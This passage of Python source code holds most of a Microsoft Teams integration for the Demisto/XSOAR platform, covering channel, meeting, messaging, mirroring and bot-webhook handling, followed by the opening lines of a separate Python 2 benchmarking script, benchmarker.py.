    return cast(Dict[Any, Any], http_request('POST', meetings_url, json_=request_json))
def create_channel_command():
    """
    Creates a channel in the requested team and reports success to the war room.
    """
    channel_name: str = demisto.args().get('channel_name', '')
    channel_description: str = demisto.args().get('description', '')
    team_name: str = demisto.args().get('team', '')
    channel_id: str = create_channel(get_team_aad_id(team_name), channel_name, channel_description)
    # Only report success when the API actually returned a channel ID
    if channel_id:
        demisto.results(f'The channel "{channel_name}" was created successfully')
def create_meeting_command():
    """
    Creates a Teams meeting for the given member and returns its details
    as command results.
    :raises ValueError: If the requested member cannot be resolved to an AAD ID
    """
    subject: str = demisto.args().get('subject', '')
    start_date_time: str = demisto.args().get('start_time', '')
    end_date_time: str = demisto.args().get('end_time', '')
    member = demisto.args().get('member', '')
    user: list = get_user(member)
    if not (user and user[0].get('id')):
        raise ValueError(f'User {member} was not found')
    meeting_data: dict = create_meeting(user[0].get('id'), subject, start_date_time, end_date_time)
    # chatInfo may be absent/empty - fall back to empty IDs in that case
    chat_info = meeting_data.get('chatInfo', {})
    thread_id = chat_info.get('threadId', '') if chat_info else ''
    message_id = chat_info.get('messageId', '') if chat_info else ''
    participant_id, participant_display_name = get_participant_info(meeting_data.get('participants', {}))
    outputs = {
        'creationDateTime': meeting_data.get('creationDateTime', ''),
        'threadId': thread_id,
        'messageId': message_id,
        'id': meeting_data.get('id', ''),
        'joinWebUrl': meeting_data.get('joinWebUrl', ''),
        'participantId': participant_id,
        'participantDisplayName': participant_display_name
    }
    return_results(CommandResults(
        readable_output=f'The meeting "{subject}" was created successfully',
        outputs_prefix='MicrosoftTeams.CreateMeeting',
        outputs_key_field='id',
        outputs=outputs
    ))
def get_participant_info(participants: dict) -> Tuple[str, str]:
    """
    Retrieves the participant ID and name
    :param participants: The participants in the Team meeting
    :return: The organizer's participant ID and display name ('' when absent)
    """
    if not participants:
        return '', ''
    organizer_user = participants.get('organizer', {}).get('identity', {}).get('user', {})
    if not organizer_user:
        return '', ''
    return organizer_user.get('id'), organizer_user.get('displayName')
def get_channel_id(channel_name: str, team_aad_id: str, investigation_id: str = None) -> str:
    """
    Retrieves Microsoft Teams channel ID
    :param channel_name: Name of channel to get ID of
    :param team_aad_id: AAD ID of team to search channel in
    :param investigation_id: Demisto investigation ID to search mirrored channel of
    :return: Requested channel ID
    :raises ValueError: If no channel matches by name (or mirrored investigation)
    """
    investigation_id = investigation_id or str()
    # First look for the channel among cached mirrored channels
    integration_context: dict = get_integration_context()
    for team in json.loads(integration_context.get('teams', '[]')):
        for mirrored_channel in team.get('mirrored_channels', []):
            if mirrored_channel.get('channel_name') == channel_name \
                    or mirrored_channel.get('investigation_id') == investigation_id:
                return mirrored_channel.get('channel_id')
    # Cache miss - query the Graph API for the team's channels
    url: str = f'{GRAPH_BASE_URL}/v1.0/teams/{team_aad_id}/channels'
    response: dict = cast(Dict[Any, Any], http_request('GET', url))
    channel_id: str = ''
    for channel in response.get('value', []):
        if channel.get('displayName', '') == channel_name:
            channel_id = channel.get('id', '')
            break
    if not channel_id:
        raise ValueError(f'Could not find channel: {channel_name}')
    return channel_id
def get_team_members(service_url: str, team_id: str) -> list:
    """
    Retrieves team members given a team
    :param team_id: ID of team to get team members of
    :param service_url: Bot service URL to query
    :return: List of team members
    """
    members_url: str = f'{service_url}/v3/conversations/{team_id}/members'
    return cast(List[Any], http_request('GET', members_url, api='bot'))
def update_message(service_url: str, conversation_id: str, activity_id: str, text: str):
    """
    Updates a message in Microsoft Teams channel
    :param service_url: Bot service URL to query
    :param conversation_id: Conversation ID of message to update
    :param activity_id: Activity ID of message to update
    :param text: Text to update in the message
    :return: None
    """
    # The replacement text is delivered as an adaptive-card attachment
    adaptive_card: dict = create_adaptive_card(body=[{'type': 'TextBlock', 'text': text}])
    conversation = {
        'type': 'message',
        'attachments': [adaptive_card]
    }
    activity_url: str = f'{service_url}/v3/conversations/{conversation_id}/activities/{activity_id}'
    http_request('PUT', activity_url, json_=conversation, api='bot')
def close_channel_request(team_aad_id: str, channel_id: str):
    """
    Sends an HTTP request to close a Microsoft Teams channel
    :param team_aad_id: AAD ID of team to close the channel in
    :param channel_id: ID of channel to close
    :return: None
    """
    http_request('DELETE', f'{GRAPH_BASE_URL}/v1.0/teams/{team_aad_id}/channels/{channel_id}')
def close_channel():
    """
    Deletes a mirrored Microsoft Teams channel
    Two modes:
      - no `channel` argument: autoclose - finds and closes the channel mirrored
        to the current investigation using the cached teams data, and removes it
        from the cache.
      - `channel` argument given: closes that channel by name in the given
        (or default) team.
    :raises ValueError: If no mirrored channel matches the current investigation
    """
    integration_context: dict = get_integration_context()
    channel_name: str = demisto.args().get('channel', '')
    investigation: dict = demisto.investigation()
    investigation_id: str = investigation.get('id', '')
    channel_id: str = str()
    team_aad_id: str
    mirrored_channels: list
    if not channel_name:
        # Closing channel as part of autoclose in mirroring process
        teams: list = json.loads(integration_context.get('teams', '[]'))
        for team in teams:
            team_aad_id = team.get('team_aad_id', '')
            mirrored_channels = team.get('mirrored_channels', [])
            for channel_index, channel in enumerate(mirrored_channels):
                if channel.get('investigation_id') == investigation_id:
                    channel_id = channel.get('channel_id', '')
                    close_channel_request(team_aad_id, channel_id)
                    # Mutating the list during enumerate is safe here because we
                    # break out of the inner loop immediately after the pop
                    mirrored_channels.pop(channel_index)
                    team['mirrored_channels'] = mirrored_channels
                    break
        if not channel_id:
            raise ValueError('Could not find Microsoft Teams channel to close.')
        # Persist the updated mirrored-channels list back to the cache
        integration_context['teams'] = json.dumps(teams)
        set_integration_context(integration_context)
    else:
        # Explicit channel name - resolve the team and channel, then delete
        team_name: str = demisto.args().get('team') or demisto.params().get('team')
        team_aad_id = get_team_aad_id(team_name)
        channel_id = get_channel_id(channel_name, team_aad_id, investigation_id)
        close_channel_request(team_aad_id, channel_id)
    demisto.results('Channel was successfully closed.')
def create_personal_conversation(integration_context: dict, team_member_id: str) -> str:
    """
    Create a personal conversation with a team member
    :param integration_context: Cached object to retrieve relevant data for the conversation creation
    :param team_member_id: ID of team member to create a conversation with
    :return: ID of created conversation
    :raises ValueError: If the bot service URL is not yet known
    """
    bot_id: str = demisto.params().get('bot_id', '')
    # The '28:' prefix marks a bot identity in the Bot Framework channel model
    conversation: dict = {
        'bot': {
            'id': f'28:{bot_id}',
            'name': integration_context.get('bot_name', '')
        },
        'members': [{
            'id': team_member_id
        }],
        'channelData': {
            'tenant': {
                'id': integration_context.get('tenant_id', '')
            }
        }
    }
    # The service URL is learned from incoming bot activities
    service_url: str = integration_context.get('service_url', '')
    if not service_url:
        raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
    response: dict = cast(
        Dict[Any, Any],
        http_request('POST', f'{service_url}/v3/conversations', json_=conversation, api='bot')
    )
    return response.get('id', '')
def send_message_request(service_url: str, channel_id: str, conversation: dict):
    """
    Sends an HTTP request to send message to Microsoft Teams
    :param channel_id: ID of channel to send message in
    :param conversation: Conversation message object to send
    :param service_url: Bot service URL to query
    :return: None
    """
    activities_url: str = f'{service_url}/v3/conversations/{channel_id}/activities'
    http_request('POST', activities_url, json_=conversation, api='bot')
def process_mentioned_users_in_message(message: str) -> Tuple[list, str]:
    """
    Processes the message to include all mentioned users in the right format. For example:
        Input: 'good morning @Demisto'
        Output (Formatted message): 'good morning <at>@Demisto</at>'
    :param message: The message to be processed
    :return: A list of the mentioned users, The processed message
    """
    mentioned_users: list = []
    for match in re.findall(MENTION_REGEX, message):
        user = ''.join(match)
        mentioned_users.append(user)
        # Wrap each mention in the <at> tags Teams expects, dropping the ';' terminator
        message = message.replace(f'@{user};', f'<at>@{user}</at>')
    return mentioned_users, message
def mentioned_users_to_entities(mentioned_users: list, integration_context: dict) -> list:
    """
    Returns a list of entities built from the mentioned users
    :param mentioned_users: A list of mentioned users in the message
    :param integration_context: Cached object to retrieve relevant data from
    :return: A list of entities
    """
    entities: list = []
    for user in mentioned_users:
        member_id = get_team_member_id(user, integration_context)
        entities.append({
            'type': 'mention',
            'mentioned': {'id': member_id, 'name': user},
            'text': f'<at>@{user}</at>'
        })
    return entities
def send_message():
    """
    Sends a message (plain text or adaptive card) to a Teams channel or to a
    team member as a personal conversation.
    Target, content and message type come from the command arguments; server
    notifications are routed to the configured notifications channel and
    filtered by the minimum severity threshold.
    :raises ValueError: On invalid adaptive card JSON, missing/conflicting
        target arguments, missing/conflicting content arguments, or an unknown
        service URL.
    """
    message_type: str = demisto.args().get('messageType', '')
    original_message: str = demisto.args().get('originalMessage', '')
    message: str = demisto.args().get('message', '')
    try:
        adaptive_card: dict = json.loads(demisto.args().get('adaptive_card', '{}'))
    except ValueError:
        raise ValueError('Given adaptive card is not in valid JSON format.')
    if message_type == MESSAGE_TYPES['mirror_entry'] and ENTRY_FOOTER in original_message:
        # Got a message which was already mirrored - skipping it
        return
    channel_name: str = demisto.args().get('channel', '')
    if (not channel_name and message_type in {MESSAGE_TYPES['status_changed'], MESSAGE_TYPES['incident_opened']}) \
            or channel_name == INCIDENT_NOTIFICATIONS_CHANNEL:
        # Got a notification from server
        channel_name = demisto.params().get('incident_notifications_channel', 'General')
        severity: int = int(demisto.args().get('severity'))
        severity_threshold: int = translate_severity(demisto.params().get('min_incident_severity', 'Low'))
        if severity < severity_threshold:
            # Below the configured severity threshold - drop the notification
            return
    team_member: str = demisto.args().get('team_member', '') or demisto.args().get('to', '')
    # Exactly one target (channel XOR team member) and exactly one content
    # form (message XOR adaptive card) must be supplied
    if not (team_member or channel_name):
        raise ValueError('No channel or team member to send message were provided.')
    if team_member and channel_name:
        raise ValueError('Provide either channel or team member to send message to, not both.')
    if not (message or adaptive_card):
        raise ValueError('No message or adaptive card to send were provided.')
    if message and adaptive_card:
        raise ValueError('Provide either message or adaptive to send, not both.')
    integration_context: dict = get_integration_context()
    channel_id: str = str()
    personal_conversation_id: str = str()
    if channel_name:
        team_name: str = demisto.args().get('team', '') or demisto.params().get('team', '')
        team_aad_id: str = get_team_aad_id(team_name)
        investigation_id: str = str()
        if message_type == MESSAGE_TYPES['mirror_entry']:
            # Got an entry from the War Room to mirror to Teams
            # Getting investigation ID in case channel name is custom and not the default
            investigation: dict = demisto.investigation()
            investigation_id = investigation.get('id', '')
        channel_id = get_channel_id(channel_name, team_aad_id, investigation_id)
    elif team_member:
        # Direct message target - open (or reuse) a personal conversation
        team_member_id: str = get_team_member_id(team_member, integration_context)
        personal_conversation_id = create_personal_conversation(integration_context, team_member_id)
    recipient: str = channel_id or personal_conversation_id
    conversation: dict
    if message:
        entitlement_match: Optional[Match[str]] = re.search(ENTITLEMENT_REGEX, message)
        if entitlement_match:
            # In TeamsAsk process - render the question as an adaptive card
            adaptive_card = process_ask_user(message)
            conversation = {
                'type': 'message',
                'attachments': [adaptive_card]
            }
        else:
            # Sending regular message: urlify links, expand @mentions into
            # <at> tags plus matching mention entities
            formatted_message: str = urlify_hyperlinks(message)
            mentioned_users, formatted_message_with_mentions = process_mentioned_users_in_message(formatted_message)
            entities = mentioned_users_to_entities(mentioned_users, integration_context)
            demisto.info(f'msg: {formatted_message_with_mentions}, ent: {entities}')
            conversation = {
                'type': 'message',
                'text': formatted_message_with_mentions,
                'entities': entities
            }
    else:  # Adaptive card
        conversation = {
            'type': 'message',
            'attachments': [adaptive_card]
        }
    service_url: str = integration_context.get('service_url', '')
    if not service_url:
        raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
    send_message_request(service_url, recipient, conversation)
    demisto.results('Message was sent successfully.')
def mirror_investigation():
    """
    Updates the integration context with a new or existing mirror.

    Creates a dedicated Teams channel for the current investigation when it is
    not mirrored yet, or updates the cached mirror configuration when it is.
    :raises ValueError: if invoked from the playground investigation.
    :return: None
    """
    investigation: dict = demisto.investigation()
    if investigation.get('type') == PLAYGROUND_INVESTIGATION_TYPE:
        raise ValueError('Can not perform this action in playground.')
    integration_context: dict = get_integration_context()
    # Mirror configuration from command arguments, with defaults
    mirror_type: str = demisto.args().get('mirror_type', 'all')
    auto_close: str = demisto.args().get('autoclose', 'true')
    mirror_direction: str = demisto.args().get('direction', 'both').lower()
    # Team argument falls back to the integration instance parameter
    team_name: str = demisto.args().get('team', '')
    if not team_name:
        team_name = demisto.params().get('team', '')
    team_aad_id: str = get_team_aad_id(team_name)
    mirrored_channels: list = list()
    # Teams are cached in the integration context as a JSON string
    teams: list = json.loads(integration_context.get('teams', '[]'))
    team: dict = dict()
    for team in teams:
        if team.get('team_aad_id', '') == team_aad_id:
            if team.get('mirrored_channels'):
                mirrored_channels = team['mirrored_channels']
            break
    # NOTE(review): if no cached team matches team_aad_id, `team` is left
    # bound to the last iterated team (or the initial empty dict), and the
    # assignment near the bottom may attach channels to the wrong object —
    # verify against the caching flow.
    if mirror_direction != 'both':
        mirror_type = f'{mirror_type}:{mirror_direction}'
    investigation_id: str = investigation.get('id', '')
    investigation_mirrored_index: int = is_investigation_mirrored(investigation_id, mirrored_channels)
    if investigation_mirrored_index > -1:
        # Updating channel mirror configuration
        mirrored_channels[investigation_mirrored_index]['mirror_type'] = mirror_type
        mirrored_channels[investigation_mirrored_index]['mirror_direction'] = mirror_direction
        mirrored_channels[investigation_mirrored_index]['auto_close'] = auto_close
        mirrored_channels[investigation_mirrored_index]['mirrored'] = False
        demisto.results('Investigation mirror was updated successfully.')
    else:
        # Not mirrored yet — create a channel and announce the mirror in it
        channel_name: str = demisto.args().get('channel_name', '') or f'incident-{investigation_id}'
        channel_description: str = f'Channel to mirror incident {investigation_id}'
        channel_id: str = create_channel(team_aad_id, channel_name, channel_description)
        service_url: str = integration_context.get('service_url', '')
        server_links: dict = demisto.demistoUrls()
        server_link: str = server_links.get('server', '')
        warroom_link: str = f'{server_link}#/WarRoom/{investigation_id}'
        conversation: dict = {
            'type': 'message',
            'text': f'This channel was created to mirror [incident {investigation_id}]({warroom_link}) '
                    f'between Teams and Demisto. In order for your Teams messages to be mirrored in Demisto, '
                    f'you need to mention the Demisto Bot in the message.'
        }
        send_message_request(service_url, channel_id, conversation)
        mirrored_channels.append({
            'channel_id': channel_id,
            'investigation_id': investigation_id,
            'mirror_type': mirror_type,
            'mirror_direction': mirror_direction,
            'auto_close': auto_close,
            'mirrored': False,
            'channel_name': channel_name
        })
        demisto.results(f'Investigation mirrored successfully in channel {channel_name}.')
    # Persist the updated team cache back to the integration context
    team['mirrored_channels'] = mirrored_channels
    integration_context['teams'] = json.dumps(teams)
    set_integration_context(integration_context)
def channel_mirror_loop():
    """
    Runs in a long running container - checking for newly mirrored investigations.

    Polls the cached teams every 5 seconds; when it finds a channel whose
    'mirrored' flag is False it starts the server-side mirror and marks it done.
    At most one channel is processed per iteration.
    :return: None
    """
    while True:
        found_channel_to_mirror: bool = False
        integration_context = get_integration_context()
        try:
            teams: list = json.loads(integration_context.get('teams', '[]'))
            for team in teams:
                mirrored_channels = team.get('mirrored_channels', [])
                channel: dict
                for channel in mirrored_channels:
                    investigation_id = channel.get('investigation_id', '')
                    if not channel['mirrored']:
                        demisto.info(f'Mirroring incident: {investigation_id} in Microsoft Teams')
                        channel_to_update: dict = channel
                        if channel_to_update['mirror_direction'] and channel_to_update['mirror_type']:
                            # Ask the server to start mirroring this investigation
                            demisto.mirrorInvestigation(
                                channel_to_update['investigation_id'],
                                channel_to_update['mirror_type'],
                                bool(strtobool(channel_to_update['auto_close']))
                            )
                            channel_to_update['mirrored'] = True
                            demisto.info(f'Mirrored incident: {investigation_id} to Microsoft Teams successfully')
                        else:
                            demisto.info(f'Could not mirror {investigation_id}')
                        # Persist the updated mirror state immediately
                        team['mirrored_channels'] = mirrored_channels
                        integration_context['teams'] = json.dumps(teams)
                        set_integration_context(integration_context)
                        found_channel_to_mirror = True
                        break
                if found_channel_to_mirror:
                    break
        except json.decoder.JSONDecodeError as json_decode_error:
            # Corrupted teams cache — report but keep the loop alive
            demisto.error(
                f'An error occurred in channel mirror loop while trying to deserialize teams from cache: '
                f'{str(json_decode_error)}'
            )
            demisto.debug(f'Cache object: {integration_context}')
            demisto.updateModuleHealth(f'An error occurred: {str(json_decode_error)}')
        except Exception as e:
            demisto.error(f'An error occurred in channel mirror loop: {str(e)}')
            demisto.updateModuleHealth(f'An error occurred: {str(e)}')
        finally:
            # Throttle the polling loop
            time.sleep(5)
def member_added_handler(integration_context: dict, request_body: dict, channel_data: dict):
    """
    Handles member added activity

    Caches the tenant ID and bot name when the bot itself was added, and
    refreshes the cached member list of the team in the integration context.
    :param integration_context: Cached object to retrieve relevant data from
    :param request_body: Activity payload
    :param channel_data: Microsoft Teams tenant, team and channel details
    :return: None
    """
    bot_id = demisto.params().get('bot_id')
    team: dict = channel_data.get('team', {})
    team_id: str = team.get('id', '')
    team_aad_id: str = team.get('aadGroupId', '')
    team_name: str = team.get('name', '')
    tenant: dict = channel_data.get('tenant', {})
    tenant_id: str = tenant.get('id', '')
    recipient: dict = request_body.get('recipient', {})
    recipient_name: str = recipient.get('name', '')
    members_added: list = request_body.get('membersAdded', [])
    teams: list = json.loads(integration_context.get('teams', '[]'))
    service_url: str = integration_context.get('service_url', '')
    if not service_url:
        raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
    for member in members_added:
        member_id = member.get('id', '')
        if bot_id in member_id:
            # The bot was added to a team, caching team ID and team members
            demisto.info(f'The bot was added to team {team_name}')
            integration_context['tenant_id'] = tenant_id
            integration_context['bot_name'] = recipient_name
            break
    # Refresh the cached member list for this team via the Bot Framework API
    team_members: list = get_team_members(service_url, team_id)
    found_team: bool = False
    for team in teams:
        if team.get('team_aad_id', '') == team_aad_id:
            team['team_members'] = team_members
            found_team = True
            break
    if not found_team:
        # Didn't found an existing team, adding new team object
        teams.append({
            'team_aad_id': team_aad_id,
            'team_id': team_id,
            'team_name': team_name,
            'team_members': team_members
        })
    integration_context['teams'] = json.dumps(teams)
    set_integration_context(integration_context)
def direct_message_handler(integration_context: dict, request_body: dict, conversation: dict, message: str):
    """
    Handles a direct message sent to the bot

    Incident-creation requests are processed locally; any other message is
    delegated to the server direct-message handler and answered either as a
    card (lists / mirror replies) or as plain text.
    :param integration_context: Cached object to retrieve relevant data from
    :param request_body: Activity payload
    :param conversation: Conversation object sent
    :param message: The direct message sent
    :return: None
    """
    conversation_id: str = conversation.get('id', '')
    from_property: dict = request_body.get('from', {})
    user_id: str = from_property.get('id', '')
    team_member: dict = get_team_member(integration_context, user_id)
    username: str = team_member.get('username', '')
    user_email: str = team_member.get('user_email', '')
    formatted_message: str = str()
    attachment: dict = dict()
    return_card: bool = False
    allow_external_incidents_creation: bool = demisto.params().get('allow_external_incidents_creation', False)
    lowered_message = message.lower()
    # Incident-creation request, e.g. "create incident" / "open new incident"
    if lowered_message.find('incident') != -1 and (lowered_message.find('create') != -1
                                                   or lowered_message.find('open') != -1
                                                   or lowered_message.find('new') != -1):
        if user_email:
            demisto_user = demisto.findUser(email=user_email)
        else:
            demisto_user = demisto.findUser(username=username)
        if not demisto_user and not allow_external_incidents_creation:
            data = 'You are not allowed to create incidents.'
        else:
            data = process_incident_create_message(demisto_user, message)
        formatted_message = urlify_hyperlinks(data)
    else:
        try:
            data = demisto.directMessage(message, username, user_email, allow_external_incidents_creation)
            return_card = True
            if data.startswith('`'):  # We got a list of incidents/tasks:
                data_by_line: list = data.replace('```', '').strip().split('\n')
                return_card = True
                if data_by_line[0].startswith('Task'):
                    attachment = process_tasks_list(data_by_line)
                else:
                    attachment = process_incidents_list(data_by_line)
            else:  # Mirror investigation command / unknown direct message
                attachment = process_mirror_or_unknown_message(data)
        except Exception as e:
            # NOTE(review): if the exception fires after return_card was set
            # to True, an empty card attachment is sent below — verify.
            data = str(e)
    if return_card:
        conversation = {
            'type': 'message',
            'attachments': [attachment]
        }
    else:
        # Fall back to the raw data when no formatted text was produced
        formatted_message = formatted_message or data
        conversation = {
            'type': 'message',
            'text': formatted_message
        }
    service_url: str = integration_context.get('service_url', '')
    if not service_url:
        raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
    send_message_request(service_url, conversation_id, conversation)
def entitlement_handler(integration_context: dict, request_body: dict, value: dict, conversation_id: str):
    """
    Handles an activity the bot received as part of the TeamsAsk flow.

    Forwards the user's response to the awaiting entitlement and edits the
    original card message to confirm submission.
    :param integration_context: Cached object to retrieve relevant data from
    :param request_body: Activity payload
    :param value: Object which includes the response and entitlement details
    :param conversation_id: Message conversation ID
    :return: None
    """
    # Resolve the responding team member from the activity sender
    sender: dict = request_body.get('from', {})
    team_member: dict = get_team_member(integration_context, sender.get('id', ''))
    # Deliver the response to the entitlement that is waiting on it
    demisto.handleEntitlementForUser(
        incidentID=value.get('investigation_id', ''),
        guid=value.get('entitlement', ''),
        taskID=value.get('task_id', ''),
        email=team_member.get('user_email', ''),
        content=value.get('response', '')
    )
    service_url: str = integration_context.get('service_url', '')
    if not service_url:
        raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
    # Replace the original card with a confirmation message
    reply_to_id: str = request_body.get('replyToId', '')
    update_message(service_url, conversation_id, reply_to_id, 'Your response was submitted successfully.')
def message_handler(integration_context: dict, request_body: dict, channel_data: dict, message: str):
    """
    Handles a message in which the bot was mentioned

    If the channel is a mirrored one and mirroring from Teams is enabled,
    the message is added as an entry in the mirrored investigation.
    :param integration_context: Cached object to retrieve relevant data from
    :param request_body: Activity payload
    :param channel_data: Microsoft Teams tenant, team and channel details
    :param message: The message which was sent mentioning the bot
    :return: None
    """
    channel: dict = channel_data.get('channel', {})
    channel_id: str = channel.get('id', '')
    team_id: str = channel_data.get('team', {}).get('id', '')
    from_property: dict = request_body.get('from', {})
    team_member_id: str = from_property.get('id', '')
    if integration_context.get('teams'):
        teams: list = json.loads(integration_context['teams'])
        for team in teams:
            if team.get('team_id', '') == team_id:
                mirrored_channels: list = team.get('mirrored_channels', [])
                for mirrored_channel in mirrored_channels:
                    if mirrored_channel.get('channel_id') == channel_id:
                        # Only mirror when direction/type allow Teams -> Demisto
                        if mirrored_channel.get('mirror_direction', '') != 'FromDemisto' \
                                and 'none' not in mirrored_channel.get('mirror_type', ''):
                            investigation_id: str = mirrored_channel.get('investigation_id', '')
                            username: str = from_property.get('name', '')
                            user_email: str = get_team_member(integration_context, team_member_id).get('user_email', '')
                            # Add the Teams message as a War Room entry
                            demisto.addEntry(
                                id=investigation_id,
                                entry=message,
                                username=username,
                                email=user_email,
                                footer=f'\n**{ENTRY_FOOTER}**'
                            )
                        return
@APP.route('/', methods=['POST'])
def messages() -> Response:
    """
    Main handler for messages sent to the bot

    Validates the Bot Framework JWT, caches the service URL, strips the bot
    mention from the text and dispatches the activity to the proper handler.
    :return: HTTP 200 response (always)
    """
    demisto.debug('Processing POST query...')
    headers: dict = cast(Dict[Any, Any], request.headers)
    if validate_auth_header(headers) is False:
        # NOTE(review): an invalid JWT is only logged — the request still
        # returns HTTP 200 below; confirm this is the intended behavior.
        demisto.info(f'Authorization header failed: {str(headers)}')
    else:
        request_body: dict = request.json
        integration_context: dict = get_integration_context()
        # Cache the service URL, used for all outgoing bot requests
        service_url: str = request_body.get('serviceUrl', '')
        if service_url:
            service_url = service_url[:-1] if service_url.endswith('/') else service_url
            integration_context['service_url'] = service_url
            set_integration_context(integration_context)
        channel_data: dict = request_body.get('channelData', {})
        event_type: str = channel_data.get('eventType', '')
        conversation: dict = request_body.get('conversation', {})
        conversation_type: str = conversation.get('conversationType', '')
        conversation_id: str = conversation.get('id', '')
        message_text: str = request_body.get('text', '')
        # Remove bot mention
        bot_name = integration_context.get('bot_name', '')
        formatted_message: str = message_text.replace(f'<at>{bot_name}</at>', '')
        value: dict = request_body.get('value', {})
        # Dispatch by activity type
        if event_type == 'teamMemberAdded':
            demisto.info('New Microsoft Teams team member was added')
            member_added_handler(integration_context, request_body, channel_data)
        elif value:
            # In TeamsAsk process
            demisto.info('Got response from user in MicrosoftTeamsAsk process')
            entitlement_handler(integration_context, request_body, value, conversation_id)
        elif conversation_type == 'personal':
            demisto.info('Got direct message to the bot')
            direct_message_handler(integration_context, request_body, conversation, formatted_message)
        else:
            demisto.info('Got message mentioning the bot')
            message_handler(integration_context, request_body, channel_data, formatted_message)
    demisto.info('Finished processing Microsoft Teams activity successfully')
    demisto.updateModuleHealth('')
    return Response(status=200)
def ring_user_request(call_request_data):
    """Send a call-creation request to the Microsoft Graph communications API."""
    calls_url = f'{GRAPH_BASE_URL}/v1.0/communications/calls'
    return http_request(method='POST', url=calls_url, json_=call_request_data)
def ring_user():
    """Rings a user on Teams.

    Notes:
        This is a ring only! no media plays in case the generated call is answered.

    Raises:
        ValueError: if the tenant ID was never received or the user is unknown.

    Returns:
        None.
    """
    bot_id = demisto.params().get('bot_id')
    integration_context: dict = get_integration_context()
    # The tenant ID is cached when the bot is first messaged/added
    tenant_id: str = integration_context.get('tenant_id', '')
    if not tenant_id:
        raise ValueError(
            'Did not receive tenant ID from Microsoft Teams, verify the messaging endpoint is configured correctly. '
            'See https://xsoar.pan.dev/docs/reference/integrations/microsoft-teams#troubleshooting for more information'
        )
    # get user to call name and id
    username_to_call = demisto.args().get('username')
    user: list = get_user(username_to_call)
    if not (user and user[0].get('id')):
        raise ValueError(f'User {username_to_call} was not found')
    # Graph "create call" payload: the bot (source) rings the user (target)
    call_request_data = {
        "@odata.type": "#microsoft.graph.call",
        "callbackUri": 'https://callback.url',
        "direction": "outgoing",
        "source": {
            "@odata.type": "#microsoft.graph.participantInfo",
            "identity": {
                "@odata.type": "#microsoft.graph.identitySet",
                "application": {
                    "@odata.type": "#microsoft.graph.identity",
                    "id": bot_id
                }
            }
        },
        "targets": [
            {
                "@odata.type": "#microsoft.graph.invitationParticipantInfo",
                "identity": {
                    "@odata.type": "#microsoft.graph.identitySet",
                    "user": {
                        "@odata.type": "#microsoft.graph.identity",
                        "displayName": username_to_call,
                        "id": user[0].get('id')
                    }
                }
            }
        ],
        "requestedModalities": [
            "audio"
        ],
        "mediaConfig": {
            "@odata.type": "#microsoft.graph.serviceHostedMediaConfig",
        },
        "tenantId": tenant_id
    }
    response = ring_user_request(call_request_data)
    return_outputs(f"Calling {username_to_call}", {}, response)
def long_running_loop():
    """
    The infinite loop which runs the mirror loop and the bot app in two different threads

    Starts the channel mirror thread, then serves the Flask app over HTTP or
    HTTPS (when a certificate/key pair is configured). On any failure the loop
    cleans up and retries after 5 seconds.
    :return: None (never returns normally)
    """
    while True:
        certificate: str = demisto.params().get('certificate', '')
        private_key: str = demisto.params().get('key', '')
        certificate_path = str()
        private_key_path = str()
        server = None
        try:
            # Resolve the listening port from the instance configuration
            port_mapping: str = PARAMS.get('longRunningPort', '')
            port: int
            if port_mapping:
                if ':' in port_mapping:
                    port = int(port_mapping.split(':')[1])
                else:
                    port = int(port_mapping)
            else:
                raise ValueError('No port mapping was provided')
            Thread(target=channel_mirror_loop, daemon=True).start()
            demisto.info('Started channel mirror loop thread')
            ssl_args = dict()
            if certificate and private_key:
                # Write the certificate and key to temp files for the server
                certificate_file = NamedTemporaryFile(delete=False)
                certificate_path = certificate_file.name
                certificate_file.write(bytes(certificate, 'utf-8'))
                certificate_file.close()
                ssl_args['certfile'] = certificate_path
                private_key_file = NamedTemporaryFile(delete=False)
                private_key_path = private_key_file.name
                private_key_file.write(bytes(private_key, 'utf-8'))
                private_key_file.close()
                ssl_args['keyfile'] = private_key_path
                demisto.info('Starting HTTPS Server')
            else:
                demisto.info('Starting HTTP Server')
            server = WSGIServer(('0.0.0.0', port), APP, **ssl_args)
            demisto.updateModuleHealth('')
            server.serve_forever()
        except Exception as e:
            error_message = str(e)
            demisto.error(f'An error occurred in long running loop: {error_message} - {format_exc()}')
            demisto.updateModuleHealth(f'An error occurred: {error_message}')
        finally:
            # Remove temp cert/key files and stop the server before retrying
            if certificate_path:
                os.unlink(certificate_path)
            if private_key_path:
                os.unlink(private_key_path)
            if server:
                server.stop()
            time.sleep(5)
def test_module():
    """Tests connectivity by retrieving a Bot Framework API token."""
    get_bot_access_token()  # raises on invalid credentials
    demisto.results('ok')
def main():
    """ COMMANDS MANAGER / SWITCH PANEL """
    # Maps each Demisto command name to the function implementing it.
    commands: dict = {
        'test-module': test_module,
        'long-running-execution': long_running_loop,
        'send-notification': send_message,
        'mirror-investigation': mirror_investigation,
        'close-channel': close_channel,
        'microsoft-teams-integration-health': integration_health,
        'create-channel': create_channel_command,
        'add-user-to-channel': add_user_to_channel_command,
        # 'microsoft-teams-create-team': create_team,
        # 'microsoft-teams-send-file': send_file,
        'microsoft-teams-ring-user': ring_user,
        'microsoft-teams-create-channel': create_channel_command,
        'microsoft-teams-add-user-to-channel': add_user_to_channel_command,
        'microsoft-teams-create-meeting': create_meeting_command,
    }
    ''' EXECUTION '''
    try:
        handle_proxy()
        command: str = demisto.command()
        LOG(f'Command being called is {command}')
        # Membership test directly on the dict — `.keys()` was redundant
        if command in commands:
            commands[command]()
    # Log exceptions
    except Exception as e:
        return_error(f'{str(e)} - {format_exc()}')
# The XSOAR server executes integration code via exec(), so __name__ is
# 'builtins' rather than '__main__' when this script is the entry point —
# NOTE(review): confirm against the target server runtime.
if __name__ == 'builtins':
    main()
|
benchmarker.py
|
from setup.linux.installer import Installer
from benchmark import framework_test
import os
import json
import subprocess
import time
import textwrap
import pprint
import csv
import sys
import logging
import socket
import glob
from multiprocessing import Process
from datetime import datetime
class Benchmarker:
##########################################################################################
# Public methods
##########################################################################################
############################################################
# Prints all the available tests
############################################################
  def run_list_tests(self):
    """Print the name of every discovered test, then run cleanup and exit."""
    all_tests = self.__gather_tests
    for test in all_tests:
      print test.name
    self.__finish()
############################################################
# End run_list_tests
############################################################
############################################################
# Prints the metadata for all the available tests
############################################################
  def run_list_test_metadata(self):
    """Write each test's metadata to <results>/test_metadata.json, then exit."""
    all_tests = self.__gather_tests
